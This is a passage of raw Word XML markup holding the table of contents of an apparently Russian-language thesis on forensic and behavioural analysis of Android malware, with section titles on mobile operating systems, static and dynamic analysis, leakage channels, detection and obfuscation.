            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Актуальность проблемы</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505522 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</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23" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Анализ современных мобильных ОС</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505523 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</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24" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.3</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Android</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505524 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>19</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25" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>iOS</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505525 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>20</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26" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.5</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Windows Phone</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505526 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>21</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27" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.6</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">Обоснование выбор ОС </w:t>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Android</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> в качестве целевой для изучения средств проведения поведенческого анализа</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505527 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>22</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28" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.7</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">Общие принципы функционирования ОС </w:t>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Android</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505528 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00007DA5" w:rsidRDefault="00F870DF">
          <w:pPr>
            <w:pStyle w:val="15"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="560"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9344"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc61505529" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>СПЕЦИАЛЬНЫЙ РАЗДЕЛ</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505529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30" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Принципы анализа следов вредоносного ПО для ОС Android</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505530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31" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1.1</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Статический анализ вредоносного ПО для андроид</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505531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32" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1.2</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Динамический анализ вредоносного ПО для андроид</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505532 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>23</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33" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Этапы анализа следов предположительно вредоносного ПО в ОС Android</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505533 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>24</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34" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Выделение каналов утечки информации</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505534 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>25</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35" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.4</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Обнаружение вредоносных приложений для Android</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505535 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>26</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36" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.5</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Методы, затрудняющие криминалистический анализ</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505536 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>26</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37" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.5.1</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Обфускация</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505537 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>27</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38" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.5.2</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Шифрование символьных строк</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
